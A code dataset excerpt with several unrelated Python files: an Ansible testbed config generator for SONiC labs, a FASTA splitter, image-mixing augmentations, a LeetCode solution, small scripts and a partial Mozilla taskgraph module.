veos.get(\"proxy_env\").get(\"https_proxy\")\n }\n }\n with open(outfile, \"w\") as toWrite:\n yaml.dump(dictData, stream=toWrite, default_flow_style=False)\n toWrite.write(\"# proxy\\n\")\n yaml.dump(proxy, stream=toWrite, default_flow_style=False)\n\n\n\"\"\"\nmakeVMHost_cred(data, outfile)\n@:parameter data - the dictionary to look for (in this case: veos)\n@:parameter outfile - the file to write to\ngenerates /group_vars/vm_host/creds.yml\npulls ansible_user, ansible_password, ansible_become_pass from vm_host_ansible into a dictionary\n\"\"\"\ndef makeVMHostCreds(data, outfile):\n veos = data\n result = {\n \"ansible_user\": veos.get(\"vm_host_ansible\").get(\"ansible_user\"),\n \"ansible_password\": veos.get(\"vm_host_ansible\").get(\"ansible_password\"),\n \"ansible_become_pass\": veos.get(\"vm_host_ansible\").get(\"ansible_become_pass\")\n }\n with open(outfile, \"w\") as toWrite:\n toWrite.write(\"---\\n\")\n yaml.dump(result, stream=toWrite, default_flow_style=False)\n\n\"\"\"\nmakeSonicLabDevices(data, outfile)\n@:parameter data - the dictionary to look through (devices dictionary)\n@:parameter outfile - the file to write to\ngenerates files/sonic_lab_devices.csv by pulling hostname, managementIP, hwsku, and type\nerror handling: checks if attribute values are None type or string \"None\"\n\"\"\"\ndef makeSonicLabDevices(data, outfile):\n csv_columns = \"Hostname,ManagementIp,HwSku,Type\"\n topology = data\n csv_file = outfile\n\n try:\n with open(csv_file, \"w\") as f:\n f.write(csv_columns + \"\\n\")\n for device, deviceDetails in topology.items():\n hostname = device\n managementIP = str(deviceDetails.get(\"ansible\").get(\"ansible_host\"))\n hwsku = deviceDetails.get(\"hwsku\")\n devType = deviceDetails.get(\"device_type\")\n\n # catch empty values\n if not managementIP:\n managementIP = \"\"\n if not hwsku:\n hwsku = \"\"\n if not devType:\n devType = \"\"\n\n row = hostname + \",\" + managementIP + \",\" + hwsku + \",\" + devType\n f.write(row + \"\\n\")\n except IOError:\n print(\"I/O error: makeSonicLabDevices\")\n\n\n\"\"\"\nmakeTestbed(data, outfile)\n@:parameter data - the dictionary to look through (devices dictionary)\n@:parameter outfile - the file to write to\ngenerates /testbed.csv by pulling confName, groupName, topo, ptf_image_name, ptf_ip, ptf_ipv6, server, vm_base, dut, and comment\nerror handling: checks if attribute values are None type or string \"None\"\n\"\"\"\ndef makeTestbed(data, outfile):\n csv_columns = \"# conf-name,group-name,topo,ptf_image_name,ptf,ptf_ip,ptf_ipv6,server,vm_base,dut,comment\"\n topology = data\n csv_file = outfile\n\n try:\n with open(csv_file, \"w\") as f:\n f.write(csv_columns + \"\\n\")\n for group, groupDetails in topology.items():\n confName = group\n groupName = groupDetails.get(\"group-name\")\n topo = groupDetails.get(\"topo\")\n ptf_image_name = groupDetails.get(\"ptf_image_name\")\n ptf_ip = groupDetails.get(\"ptf_ip\")\n ptf_ipv6 = groupDetails.get(\"ptf_ipv6\")\n server = groupDetails.get(\"server\")\n vm_base = groupDetails.get(\"vm_base\")\n dut = groupDetails.get(\"dut\")\n ptf = groupDetails.get(\"ptf\")\n comment = groupDetails.get(\"comment\")\n\n # catch empty types\n if not groupName:\n groupName = \"\"\n if not topo:\n topo = \"\"\n if not ptf_image_name:\n ptf_image_name = \"\"\n if not ptf_ip:\n ptf_ip = \"\"\n if not ptf_ipv6:\n ptf_ipv6 = \"\"\n if not server:\n server = \"\"\n if not vm_base:\n vm_base = \"\"\n if not dut:\n dut = \"\"\n if not ptf:\n ptf = \"\"\n if not comment:\n comment = \"\"\n\n row 
= confName + \",\" + groupName + \",\" + topo + \",\" + ptf_image_name + \",\" + ptf + \",\" + ptf_ip + \",\" + ptf_ipv6 + \",\"+ server + \",\" + vm_base + \",\" + dut + \",\" + comment\n f.write(row + \"\\n\")\n except IOError:\n print(\"I/O error: issue creating testbed.csv\")\n\n\n\"\"\"\nmakeSonicLabLinks(data, outfile)\n@:parameter data - the dictionary to look through (devices dictionary)\n@:parameter outfile - the file to write to\ngenerates /files/sonic_lab_links.csv by pulling startPort, endPort, bandWidth, vlanID, vlanMode\nerror handling: checks if attribute values are None type or string \"None\"\n\"\"\"\ndef makeSonicLabLinks(data, outfile):\n csv_columns = \"StartDevice,StartPort,EndDevice,EndPort,BandWidth,VlanID,VlanMode\"\n topology = data\n csv_file = outfile\n\n try:\n with open(csv_file, \"w\") as f:\n f.write(csv_columns + \"\\n\")\n for key, item in topology.items():\n startDevice = key\n interfacesDetails = item.get(\"interfaces\")\n\n for startPort, element in interfacesDetails.items():\n startPort = startPort\n endDevice = element.get(\"EndDevice\")\n endPort = element.get(\"EndPort\")\n bandWidth = element.get(\"Bandwidth\")\n vlanID = element.get(\"VlanID\")\n vlanMode = element.get(\"VlanMode\")\n\n # catch empty values\n if not endDevice:\n endDevice = \"\"\n if not endPort:\n endPort = \"\"\n if not bandWidth:\n bandWidth = \"\"\n if not vlanID:\n vlanID = \"\"\n if not vlanMode:\n vlanMode = \"\"\n\n row = startDevice + \",\" + startPort + \",\" + endDevice + \",\" + endPort + \",\" + str(bandWidth) + \",\" + str(vlanID) + \",\" + vlanMode\n f.write(row + \"\\n\")\n except IOError:\n print(\"I/O error: issue creating sonic_lab_links.csv\")\n\n\n\"\"\"\nmakeEOS_creds(data, outfile)\n@:parameter data - the dictionary to look through\n@:parameter outfile - the file to write to\nGenerate /group_vars/eos/creds.yml\nWorks by looking through veos dictionary and pulling ansible_user and ansible_password under eos_ansible\n\"\"\"\ndef makeEOSCreds(data, outfile):\n veos = data\n result = {\n \"ansible_user\": veos.get(\"eos_ansible\").get(\"ansible_user\"),\n \"ansible_password\": veos.get(\"eos_ansible\").get(\"ansible_password\")\n }\n with open(outfile, \"w\") as toWrite:\n toWrite.write(\"---\\n\")\n yaml.dump(result, stream=toWrite, default_flow_style=False)\n\n\n\"\"\"\nmakeFanout_secrets(data, outfile)\n@:parameter data - reads from devices dictionary\n@:parameter outfile - the file to write to\nMakes /group_vars/fanout/secrets.yml\nFinds the fanout secret credentials by using \"fanout\" as the value to search for under device_type\nUnder github and personal topology configuration, there is only one designated fanout switch credential\n\"\"\"\ndef makeFanoutSecrets(data, outfile):\n devices = data\n result = dict()\n\n for key, value in devices.items():\n if \"fanout\" in value.get(\"device_type\").lower():\n result.update({\"ansible_ssh_user\": value.get(\"ansible\").get(\"ansible_ssh_user\")})\n result.update({\"ansible_ssh_pass\": value.get(\"ansible\").get(\"ansible_ssh_pass\")})\n\n with open(outfile, \"w\") as toWrite:\n yaml.dump(result, stream=toWrite, default_flow_style=False)\n\n\n\"\"\"\nmakeLab_secrets(data, outfile)\n@:parameter data - reads from devices dictionary\n@:parameter outfile - the file to write to\nMakes /group_vars/lab/secrets.yml\nFinds the lab device to generate the secret.yml file using \"server\" as the value to search for under device_type\nUnder github and personal topology configuration, there is only one designated lab 
server\n\"\"\"\ndef makeLabSecrets(data, outfile):\n devices = data\n result = dict()\n\n for key, value in devices.items():\n if \"server\" in value.get(\"device_type\").lower():\n result.update({\"ansible_ssh_pass\": value.get(\"ansible\").get(\"ansible_ssh_pass\")})\n result.update({\"ansible_become_pass\": value.get(\"ansible\").get(\"ansible_become_pass\")})\n result.update({\"sonicadmin_user\": value.get(\"ansible\").get(\"sonicadmin_user\")})\n result.update({\"sonicadmin_password\": value.get(\"ansible\").get(\"sonicadmin_password\")})\n result.update({\"sonicadmin_initial_password\": value.get(\"ansible\").get(\"sonicadmin_initial_password\")})\n\n with open(outfile, \"w\") as toWrite:\n yaml.dump(result, stream=toWrite, default_flow_style=False)\n\n\"\"\"\nmakeLab(data, veos, devices, outfile)\n@:parameter data - reads from devices-groups, this helps separate the function into 3 components; children, host, vars\n@:parameter devices - reads from devices\n@:parameter testbed - reads from testbed (to accomodate for PTF container(s))\n@:parameter outfile - writes to lab\n\"\"\"\ndef makeLab(data, devices, testbed, outfile):\n deviceGroup = data\n with open(outfile, \"w\") as toWrite:\n for key, value in deviceGroup.items():\n #children section\n if \"children\" in value:\n toWrite.write(\"[\" + key + \":children]\\n\")\n for child in value.get(\"children\"):\n toWrite.write(child + \"\\n\")\n toWrite.write(\"\\n\")\n\n #host section\n if \"host\" in value:\n toWrite.write(\"[\" + key + \"]\\n\")\n for host in value.get(\"host\"):\n entry = host\n\n if \"ptf\" in key:\n try: #get ansible host\n ansible_host = testbed.get(host).get(\"ansible\").get(\"ansible_host\")\n entry += \"\\tansible_host=\" + ansible_host.split(\"/\")[0]\n except:\n print(\"\\t\\t\" + host + \": ansible_host not found\")\n\n if ansible_host:\n try: # get ansible ssh username\n ansible_ssh_user = testbed.get(host.lower()).get(\"ansible\").get(\"ansible_ssh_user\")\n entry += \"\\tansible_ssh_user=\" + ansible_ssh_user\n except:\n print(\"\\t\\t\" + host + \": ansible_ssh_user not found\")\n\n try: # get ansible ssh pass\n ansible_ssh_pass = testbed.get(host.lower()).get(\"ansible\").get(\"ansible_ssh_pass\")\n entry += \"\\tansible_ssh_pass=\" + ansible_ssh_pass\n except:\n print(\"\\t\\t\" + host + \": ansible_ssh_pass not found\")\n else: #not ptf container\n try: #get ansible host\n ansible_host = devices.get(host.lower()).get(\"ansible\").get(\"ansible_host\")\n entry += \"\\tansible_host=\" + ansible_host.split(\"/\")[0]\n except:\n print(\"\\t\\t\" + host + \": ansible_host not found\")\n\n if ansible_host:\n try: # get ansible ssh username\n ansible_ssh_user = devices.get(host.lower()).get(\"ansible\").get(\"ansible_ssh_user\")\n entry += \"\\tansible_ssh_user=\" + ansible_ssh_user\n except:\n print(\"\\t\\t\" + host + \": ansible_ssh_user not found\")\n\n try: # get ansible ssh pass\n ansible_ssh_pass = devices.get(host.lower()).get(\"ansible\").get(\"ansible_ssh_pass\")\n entry += \"\\tansible_ssh_pass=\" + ansible_ssh_pass\n except:\n print(\"\\t\\t\" + host + \": ansible_ssh_pass not found\")\n\n toWrite.write(entry + \"\\n\")\n toWrite.write(\"\\n\")\n\n #vars section\n if \"vars\" in value:\n toWrite.write(\"[\" + key + \":vars]\\n\")\n for key2, val2 in value.get(\"vars\").items():\n if isinstance(val2, list) or isinstance(val2, dict):\n toWrite.write(key2 + \"=[\" + ', '.join(val2) + \"]\\n\")\n else:\n toWrite.write(key2 + \"=\" + val2 + \"\\n\")\n toWrite.write(\"\\n\")\n\n\"\"\"\nmakeVeos(data, 
veos, devices, outfile)\n@:parameter data - reads from either veos-groups, this helps separate the function into 3 components; children, host, vars\n@:parameter veos - reads from either veos\n@:parameter devices - reads from devices\n@:parameter outfile - writes to veos\n\"\"\"\ndef makeVeos(data, veos, devices, outfile):\n group = data\n with open(outfile, \"w\") as toWrite:\n for key, value in group.items():\n # children section\n if \"children\" in value:\n toWrite.write(\"[\" + key + \":children]\\n\")\n for child in value.get(\"children\"):\n toWrite.write(child + \"\\n\")\n toWrite.write(\"\\n\")\n\n # host section\n if \"host\" in value:\n toWrite.write(\"[\" + key + \"]\\n\")\n for host in value.get(\"host\"):\n entry = host\n\n try:\n ansible_host = devices.get(host.lower()).get(\"ansible\").get(\"ansible_host\")\n entry += \"\\tansible_host=\" + ansible_host.split(\"/\")[0]\n except:\n try:\n ansible_host = veos.get(key).get(host).get(\"ansible_host\")\n entry += \"\\tansible_host=\" + ansible_host.split(\"/\")[0]\n except:\n print(\"\\t\\t\" + host + \": ansible_host not found\")\n toWrite.write(entry + \"\\n\")\n\n toWrite.write(\"\\n\")\n\n #var section\n if \"vars\" in value:\n toWrite.write(\"[\" + key + \":vars]\\n\")\n for key2, val2 in value.get(\"vars\").items():\n if isinstance(val2, list) or isinstance(val2, dict):\n toWrite.write(key2 + \"=[\" + ', '.join(val2) + \"]\\n\")\n else:\n toWrite.write(key2 + \"=\" + val2 + \"\\n\")\n toWrite.write(\"\\n\")\n\n\n\"\"\"\nmakeHost_var(data)\n@:parameter data - reads from host_vars dictionary\nCreates host variable files for each device\n\"\"\"\ndef makeHostVar(data):\n host_vars = data\n for key, value in host_vars.items(): # iterate through all devices in host_vars dictionary\n with open(args.basedir + \"host_vars/\" + key.upper() + \".yml\", \"w\") as toWrite: # create (or overwrite) a file named .yml\n for attribute, attribute_data in value.items(): # for each element in device's dictionary\n toWrite.write(str(attribute) + \": \" + str(attribute_data) + \"\\n\") # write the attribute and the attribute value to .yml\n\n\"\"\"\nupdateDockerRegistry\n@:parameter outfile - the file to write to\nhard codes the docker registry to search locally rather than externally\n\"\"\"\ndef updateDockerRegistry(docker_registry, outfile):\n if not docker_registry.get(\"docker_registry_host\"):\n print(\"\\t\\tREGISTRY FIELD BLANK - SKIPPING THIS STEP\")\n else:\n with open(outfile, \"w\") as toWrite:\n toWrite.write(\"docker_registry_host: \" + docker_registry.get(\"docker_registry_host\"))\n toWrite.write(\"\\n\\n\")\n\n\ndef main():\n print(\"PROCESS STARTED\")\n ##############################################################\n print(\"BACKUP PROCESS STARTED\") # Backup data\n for file in backupList:\n try:\n copyfile(args.basedir + file, args.backupdir + \"/\" + timestamp + \"/\" + file)\n except IOError: # filenotfound\n print(\"Error: could not back up \" + args.basedir + file)\n\n host_var_files = os.listdir(args.basedir + \"host_vars\")\n for file_name in host_var_files:\n copyfile(args.basedir + \"host_vars/\" + file_name,\n args.backupdir + \"/\" + timestamp + \"/host_vars/\" + file_name)\n\n print(\"BACKUP PROCESS COMPLETED\")\n\n ##############################################################\n # Load Data\n print(\"LOADING PROCESS STARTED\")\n print(\"LOADING: \" + args.i)\n doc = yaml.load(open(args.i, 'r'))\n devices = dict() # dictionary contains information about devices\n generateDictionary(doc, devices, \"devices\") # load 
devices\n veos = dict() # dictionary contains information about veos\n generateDictionary(doc, veos, \"veos\") # load veos\n testbed = dict() # dictionary contains information about testbed (ptf)\n generateDictionary(doc, testbed, \"testbed\") # load testbed\n topology = dict() # dictionary contains information about toplogy\n generateDictionary(doc, topology, \"topology\") # load topology\n host_vars = dict() # dictionary contains information about host_vars\n generateDictionary(doc, host_vars, \"host_vars\") # load host_vars\n veos_groups = dict() # dictionary contains information about veos_groups\n generateDictionary(doc, veos_groups, \"veos_groups\") # load veos_groups\n device_groups = dict() # dictionary contains information about device_groups\n generateDictionary(doc, device_groups, \"device_groups\") # load device_groups\n docker_registry = dict() # dictionary contains information about docker_registry\n generateDictionary(doc, docker_registry, \"docker_registry\") #load docker_registry\n print(\"LOADING PROCESS COMPLETED\")\n\n ##############################################################\n # Generate files\n print(\"GENERATING FILES FROM CONFIG FILE\")\n print(\"\\tCREATING SONIC LAB LINKS: \" + args.basedir + labLinks_file)\n makeSonicLabLinks(topology, args.basedir + labLinks_file) # Generate sonic_lab_links.csv (TOPOLOGY)\n print(\"\\tCREATING SONIC LAB DEVICES: \" + args.basedir + devices_file)\n makeSonicLabDevices(devices, args.basedir + devices_file) # Generate sonic_lab_devices.csv (DEVICES)\n print(\"\\tCREATING TEST BED: \" + args.basedir + testbed_file)\n makeTestbed(testbed, args.basedir + testbed_file) # Generate testbed.csv (TESTBED)\n print(\"\\tCREATING VM_HOST/CREDS: \" + args.basedir + vmHostCreds_file)\n makeVMHostCreds(veos, args.basedir + vmHostCreds_file) # Generate vm_host\\creds.yml (CREDS)\n print(\"\\tCREATING EOS/CREDS: \" + args.basedir + eosCred_file)\n makeEOSCreds(veos, args.basedir + eosCred_file) # Generate eos\\creds.yml (CREDS)\n print(\"\\tCREATING FANOUT/SECRETS: \" + args.basedir + fanoutSecrets_file)\n makeFanoutSecrets(devices, args.basedir + fanoutSecrets_file) # Generate fanout\\secrets.yml (SECRETS)\n print(\"\\tCREATING LAB SECRETS: \" + args.basedir + labSecrets_file)\n makeLabSecrets(devices, args.basedir + labSecrets_file) # Generate lab\\secrets.yml (SECRETS)\n print(\"\\tCREATING MAIN.YML: \" + args.basedir + main_file)\n makeMain(veos, args.basedir + main_file) # Generate main.yml (MAIN)\n print(\"\\tCREATING LAB FILE: \" + args.basedir + lab_file)\n makeLab(device_groups, devices, testbed, args.basedir + lab_file) # Generate lab (LAB)\n print(\"\\tCREATING VEOS FILE: \" + args.basedir + veos_file)\n makeVeos(veos_groups, veos, devices, args.basedir + veos_file) # Generate veos (VEOS)\n print(\"\\tCREATING HOST VARS FILE(S): one or more files generated\")\n makeHostVar(host_vars) # Generate host_vars (HOST_VARS)\n print(\"UPDATING FILES FROM CONFIG FILE\")\n print(\"\\tUPDATING DOCKER REGISTRY\")\n updateDockerRegistry(docker_registry, args.basedir + dockerRegistry_file)\n print(\"PROCESS COMPLETED\")\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"hwiewie/ansible","sub_path":"TestbedProcessing.py","file_name":"TestbedProcessing.py","file_ext":"py","file_size_in_byte":26079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"28910185011","text":"#!/usr/bin/python\nimport sys\n\nif len(sys.argv) == 3:\n input_file = sys.argv[1]\n outdir = sys.argv[2]\nelse:\n 
print(\"usage: ./split.py input_file outdir\")\n sys.exit(1)\n\n#parse input query\ninput = open(input_file)\nqueries = []\nquery = \"\"\nname = \"\"\nfor line in input.readlines():\n if line[0] == \">\":\n if name != \"\":\n queries.append([name, query])\n name = line\n query = \"\"\n else:\n query += line\nif name != \"\":\n queries.append([name, query])\ninput.close()\n\n#output each files\nblock = {}\ncount = 0\nfor query in queries:\n outfile = open(\"%s/%07d.fasta\" % (outdir, count), \"w\")\n outfile.write(query[1])\n outfile.close()\n count+=1\n","repo_name":"pegasus-isi/BLAST-Workflow","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"70343805030","text":"import numpy as np\r\nimport torch\r\nfrom utils import rand_box\r\nimport torch.nn.functional as F\r\n\r\ndef mixup(images, labels, alpha=0.4, gpu=True):\r\n lam = np.random.beta(alpha, alpha)\r\n\r\n batch_size = images.size()[0]\r\n if gpu:\r\n indices = torch.randperm(batch_size).cuda()\r\n else:\r\n indices = torch.randperm(batch_size)\r\n\r\n mixed_images = lam*images + (1 - lam)*images[indices, :]\r\n\r\n return mixed_images, labels, labels[indices], lam\r\n\r\ndef cutmix(images, labels, alpha=0.4, gpu=True):\r\n lam = np.random.beta(alpha, alpha)\r\n\r\n batch_size = images.size()[0]\r\n if gpu:\r\n indices = torch.randperm(batch_size).cuda()\r\n else:\r\n indices = torch.randperm(batch_size)\r\n\r\n bbx1, bby1, bbx2, bby2 = rand_box(images.size()[2], images.size()[3], lam)\r\n images[:, :, bbx1:bbx2, bby1:bby2] = images[indices, :, bbx1:bbx2, bby1:bby2]\r\n\r\n lam = 1 - ((bbx2 - bbx1)*(bby2 - bby1) / (images.size()[2]*images.size()[3]))\r\n\r\n return images, labels, labels[indices], lam\r\n\r\ndef rand_bbox(size, lam):\r\n W = size[2]\r\n H = size[3]\r\n cut_rat = np.sqrt(1. 
- lam)\r\n cut_w = np.int(W * cut_rat)\r\n cut_h = np.int(H * cut_rat)\r\n\r\n # uniform\r\n cx = np.random.randint(W)\r\n cy = np.random.randint(H)\r\n\r\n bbx1 = np.clip(cx - cut_w // 2, 0, W)\r\n bby1 = np.clip(cy - cut_h // 2, 0, H)\r\n bbx2 = np.clip(cx + cut_w // 2, 0, W)\r\n bby2 = np.clip(cy + cut_h // 2, 0, H)\r\n\r\n return bbx1, bby1, bbx2, bby2\r\n\r\ndef get_spm(input,target,model):\r\n imgsize = (512, 512)\r\n bs = input.size(0)\r\n with torch.no_grad():\r\n output,fms = model(input)\r\n clsw = model.module.classifier\r\n weight = clsw.weight.data\r\n bias = clsw.bias.data\r\n weight = weight.view(weight.size(0),weight.size(1),1,1)\r\n fms = F.relu(fms)\r\n poolfea = F.adaptive_avg_pool2d(fms,(1,1)).squeeze()\r\n clslogit = F.softmax(clsw.forward(poolfea))\r\n #logit_numpy = clslogit.cpu().detach().numpy()\r\n target_numpy = target.cpu().detach().numpy()\r\n #print(logit_numpy)\r\n logitlist = []\r\n for i in range(bs):\r\n #print(i, target_numpy[i])\r\n logitlist.append(clslogit[i, int(target_numpy[i])])\r\n clslogit = torch.stack(logitlist)\r\n\r\n out = F.conv2d(fms, weight, bias=bias)\r\n\r\n outmaps = []\r\n for i in range(bs):\r\n evimap = out[i,int(target_numpy[i])]\r\n outmaps.append(evimap)\r\n\r\n outmaps = torch.stack(outmaps)\r\n if imgsize is not None:\r\n outmaps = outmaps.view(outmaps.size(0),1,outmaps.size(1),outmaps.size(2))\r\n outmaps = F.interpolate(outmaps,imgsize,mode='bilinear',align_corners=False)\r\n\r\n outmaps = outmaps.squeeze()\r\n\r\n for i in range(bs):\r\n outmaps[i] -= outmaps[i].min()\r\n outmaps[i] /= outmaps[i].sum()\r\n\r\n\r\n return outmaps,clslogit\r\n\r\ndef snapmix(input, target, alpha, model=None):\r\n r = np.random.rand(1)\r\n lam_a = torch.ones(input.size(0))\r\n lam_b = 1 - lam_a\r\n target_b = target.clone()\r\n\r\n if True:\r\n wfmaps,_ = get_spm(input, target, model)\r\n bs = input.size(0)\r\n lam = np.random.beta(alpha, alpha)\r\n lam1 = np.random.beta(alpha, alpha)\r\n rand_index = torch.randperm(bs).cuda()\r\n wfmaps_b = wfmaps[rand_index,:,:]\r\n target_b = target[rand_index]\r\n\r\n same_label = target == target_b\r\n bbx1, bby1, bbx2, bby2 = rand_bbox(input.size(), lam)\r\n bbx1_1, bby1_1, bbx2_1, bby2_1 = rand_bbox(input.size(), lam1)\r\n\r\n area = (bby2-bby1)*(bbx2-bbx1)\r\n area1 = (bby2_1-bby1_1)*(bbx2_1-bbx1_1)\r\n\r\n if area1 > 0 and area>0:\r\n ncont = input[rand_index, :, bbx1_1:bbx2_1, bby1_1:bby2_1].clone()\r\n ncont = F.interpolate(ncont, size=(bbx2-bbx1,bby2-bby1), mode='bilinear', align_corners=True)\r\n input[:, :, bbx1:bbx2, bby1:bby2] = ncont\r\n lam_a = 1 - wfmaps[:,bbx1:bbx2,bby1:bby2].sum(2).sum(1)/(wfmaps.sum(2).sum(1)+1e-8)\r\n lam_b = wfmaps_b[:,bbx1_1:bbx2_1,bby1_1:bby2_1].sum(2).sum(1)/(wfmaps_b.sum(2).sum(1)+1e-8)\r\n tmp = lam_a.clone()\r\n lam_a[same_label] += lam_b[same_label]\r\n lam_b[same_label] += tmp[same_label]\r\n lam = 1 - ((bbx2 - bbx1) * (bby2 - bby1) / (input.size()[-1] * input.size()[-2]))\r\n lam_a[torch.isnan(lam_a)] = lam\r\n lam_b[torch.isnan(lam_b)] = 1-lam\r\n\r\n return input,target,target_b,lam_a.cuda(),lam_b.cuda()","repo_name":"freedom1810/kaggle-cassava","sub_path":"engine/augments.py","file_name":"augments.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"71"} +{"seq_id":"24583443843","text":"class Solution:\n def convertTime(self, current: str, correct: str) -> int:\n if current == correct:\n return 0\n \n cur_hour, cur_min = map(lambda x: int(x), current.split(\":\"))\n 
cor_hour, cor_min = map(lambda x: int(x), correct.split(\":\"))\n operations = [15, 5, 1]\n res = 0\n if cur_min > cor_min:\n minute_diff = (60 - cur_min) + cor_min\n cur_hour += 1\n else:\n minute_diff = cor_min - cur_min\n \n for op in operations:\n num_ops, minute_diff = divmod(minute_diff, op)\n res += num_ops\n\n if cur_hour > cor_hour:\n res += (24 - cur_hour) + cor_hour\n else:\n res += cor_hour - cur_hour\n\n return res\n \n\ndef main():\n sol = Solution()\n print(sol.convertTime(current = \"02:30\", correct = \"04:35\"))\n print(sol.convertTime(current = \"11:00\", correct = \"11:01\"))\n\nif __name__ == '__main__':\n main()","repo_name":"brandoneng000/LeetCode","sub_path":"easy/2224.py","file_name":"2224.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72849151909","text":"l = ['Thiru - velchry','Thiru - porur','Thiru - roya','Thiru - koyam']\r\nv = ['Bike','Auto','Mini','Micro','Prime']\r\nfor a,b in enumerate(l,1):\r\n print(a,b)\r\nwhile True:\r\n loc = int(input('Enter the number of your selection :'))\r\n if loc>0 and loc<=len(l):\r\n break\r\n else:\r\n print('Selection Invalid')\r\nfor a,b in enumerate(v,1):\r\n print(a,b)\r\nwhile True:\r\n veh = int(input('Enter the number of your selection :'))\r\n if veh>0 and veh<=len(v):\r\n break\r\n else:\r\n print('Selection Invalid')\r\ncos = loc*100+veh*10\r\nprint('The cost is :Rs.',cos)\r\n","repo_name":"DeonysDavidson/python-projects","sub_path":"UberBilling.py","file_name":"UberBilling.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13924797568","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 12 20:50:59 2021\r\n\r\n@author: 皮皮卡卡\r\n\"\"\"\r\nimport openpyxl as pyxl\r\nfrom openpyxl.utils import get_column_letter, column_index_from_string #translate column letter or number \r\n\r\nwb = pyxl.load_workbook('example.xlsx') #到這邊都必要的\r\nsheet = wb['sheet1'] #get a cell form the sheet\r\nsheet = wb.active #the sheet which you first get when you open excel.\r\nfor i in range(1, 8, 2):\r\n print(i, sheet.cell(row=i, column=2).value)\r\n\r\nprint(sheet.max_column)\r\n'''\r\nwe can get letter of colume and number translating\r\n'''\r\n\r\nprint(get_column_letter(900))\r\nprint(column_index_from_string('A'))\r\n'''\r\nwe can use the 'slice' to get specific data from a rectangle range in excel.\r\n'''\r\n\r\nfor rowcellobject in sheet['B1':'B7']:\r\n for obj in rowcellobject:\r\n print(obj.coordinate, obj.value) #是一個正方形,從A1到C3,當然也可以是一格的長方形(單行)\r\n \r\n \r\n \r\n \r\n","repo_name":"pikaiscoming/python_learning","sub_path":"Day_21_excel.py","file_name":"Day_21_excel.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"20738723766","text":"# -*- coding: utf-8 -*-\n\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport os\nimport json\n\nfrom taskgraph import try_option_syntax\nfrom taskgraph.util.attributes import match_run_on_projects\n\n_target_task_methods = {}\n\n\ndef _target_task(name):\n def wrap(func):\n _target_task_methods[name] = func\n return func\n return wrap\n\n\ndef get_method(method):\n \"\"\"Get a target_task_method to pass to a TaskGraphGenerator.\"\"\"\n return _target_task_methods[method]\n\n\ndef filter_on_nightly(task, parameters):\n return not task.attributes.get('nightly') or parameters.get('include_nightly')\n\n\ndef filter_for_project(task, parameters):\n \"\"\"Filter tasks by project. Optionally enable nightlies.\"\"\"\n run_on_projects = set(task.attributes.get('run_on_projects', []))\n return match_run_on_projects(parameters['project'], run_on_projects)\n\n\ndef filter_upload_symbols(task, parameters):\n # Filters out symbols when there are not part of a nightly or a release build\n # TODO Remove this too specific filter (bug 1353296)\n return '-upload-symbols' not in task.label or \\\n task.attributes.get('nightly') or \\\n parameters.get('project') in ('mozilla-beta', 'mozilla-release')\n\n\ndef standard_filter(task, parameters):\n return all(\n filter_func(task, parameters) for filter_func in\n (filter_on_nightly, filter_for_project, filter_upload_symbols)\n )\n\n\ndef _try_task_config(full_task_graph, parameters):\n task_config_file = os.path.join(os.getcwd(), 'try_task_config.json')\n\n if not os.path.isfile(task_config_file):\n return []\n\n with open(task_config_file, 'r') as fh:\n task_config = json.load(fh)\n\n target_task_labels = []\n for task in full_task_graph.tasks.itervalues():\n if task.label in task_config:\n target_task_labels.append(task.label)\n\n return target_task_labels\n\n\ndef _try_option_syntax(full_task_graph, parameters):\n \"\"\"Generate a list of target tasks based on try syntax in\n parameters['message'] and, for context, the full task graph.\"\"\"\n options = try_option_syntax.TryOptionSyntax(parameters['message'], full_task_graph)\n target_tasks_labels = [t.label for t in full_task_graph.tasks.itervalues()\n if options.task_matches(t)]\n\n attributes = {\n k: getattr(options, k) for k in [\n 'env',\n 'no_retry',\n 'tag',\n ]\n }\n\n for l in target_tasks_labels:\n task = full_task_graph[l]\n if 'unittest_suite' in task.attributes:\n task.attributes['task_duplicates'] = options.trigger_tests\n\n for l in target_tasks_labels:\n task = full_task_graph[l]\n # If the developer wants test jobs to be rebuilt N times we add that value here\n if options.trigger_tests > 1 and 'unittest_suite' in task.attributes:\n task.attributes['task_duplicates'] = options.trigger_tests\n task.attributes['profile'] = False\n\n # If the developer wants test talos jobs to be rebuilt N times we add that value here\n if options.talos_trigger_tests > 1 and task.attributes.get('unittest_suite') == 'talos':\n task.attributes['task_duplicates'] = options.talos_trigger_tests\n task.attributes['profile'] = options.profile\n\n task.attributes.update(attributes)\n\n # Add notifications here as well\n if options.notifications:\n for task in full_task_graph:\n owner = parameters.get('owner')\n routes = task.task.setdefault('routes', [])\n if options.notifications == 'all':\n routes.append(\"notify.email.{}.on-any\".format(owner))\n elif options.notifications == 'failure':\n 
